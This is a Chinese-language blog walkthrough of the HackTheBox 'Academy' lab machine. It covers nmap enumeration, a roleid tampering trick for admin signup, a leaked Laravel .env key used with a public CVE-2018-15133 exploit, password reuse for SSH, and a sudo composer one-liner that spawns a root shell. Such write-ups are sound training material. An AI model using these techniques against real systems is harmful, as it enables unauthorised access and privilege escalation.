文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术

 2021-01-24   730

HackTheBox Academy Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • Nmap
  • Logic vulnerabilities
  • Sensitive information
  • Laravel cve-2018-15133
  • Audit log
  • Composer elevate privileges

0x03 Pentesting

Initial Enumeration

nmap端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Nmap 7.91 scan initiated Sun Jan 24 09:16:47 2021 as: nmap -sV -sC -T4 -oN nmap.txt academy.htb
Warning: 10.10.10.215 giving up on port because retransmission cap hit (6).
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.10s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
1812/tcp filtered radius
2366/tcp filtered qip-login
4004/tcp filtered pxc-roid
4662/tcp filtered edonkey
5811/tcp filtered unknown
10215/tcp filtered unknown
28201/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 24 09:18:53 2021 -- 1 IP address (1 host up) scanned in 126.11 seconds

80端口:

注册时修改roleid=1就可以注册一个管理员账户,用管理员账户登录:

给出了一个域名dev-staging-01.academy.htb,把这个域名添加到/etc/hosts中,浏览器访问:

显示laravel的报错信息,其中泄露了一些敏感配置信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
APP_NAME	"Laravel"
APP_ENV "local"
APP_KEY "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG "true"
APP_URL "http://localhost"
LOG_CHANNEL "stack"
DB_CONNECTION "mysql"
DB_HOST "127.0.0.1"
DB_PORT "3306"
DB_DATABASE "homestead"
DB_USERNAME "homestead"
DB_PASSWORD "secret"
BROADCAST_DRIVER "log"
CACHE_DRIVER "file"
SESSION_DRIVER "file"
SESSION_LIFETIME "120"
QUEUE_DRIVER "sync"
REDIS_HOST "127.0.0.1"
REDIS_PASSWORD "null"
REDIS_PORT "6379"
MAIL_DRIVER "smtp"
MAIL_HOST "smtp.mailtrap.io"
MAIL_PORT "2525"
MAIL_USERNAME "null"
MAIL_PASSWORD "null"
MAIL_ENCRYPTION "null"
PUSHER_APP_ID ""
PUSHER_APP_KEY ""
PUSHER_APP_SECRET ""
PUSHER_APP_CLUSTER "mt1"
MIX_PUSHER_APP_KEY ""
MIX_PUSHER_APP_CLUSTER "mt1"

Googlelaravel exploite

利用这个第一个工具:https://github.com/aljavier/exploit_laravel_cve-2018-15133

拿到www-data用户权限:

Getting User Access

上传一个提权脚本linpeas.sh,拿到DB密码:

1
2
3
4
5
6
/var/www/html/academy/.env.example:DB_PASSWORD=secret
/var/www/html/academy/.env.example:MAIL_PASSWORD=null
/var/www/html/academy/.env.example:REDIS_PASSWORD=null
/var/www/html/academy/.env:DB_PASSWORD=mySup3rP4s5w0rd!! #interesting
/var/www/html/academy/.env:MAIL_PASSWORD=null
/var/www/html/academy/.env:REDIS_PASSWORD=null

用这个DB密码SSH登录cry0l1t3

1
2
ssh [email protected]
mySup3rP4s5w0rd!!

拿到user.txt

Getting Root Access

折腾了半天,看眼YouTube的视频,发现还是跟Doctor这个靶机比较像,从log入手:

1
cat /var/log/audit/audit* | grep 'comm="sudo"'

1
2
3
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

Copyright © ca01h 2019-2021 | 本站总访问量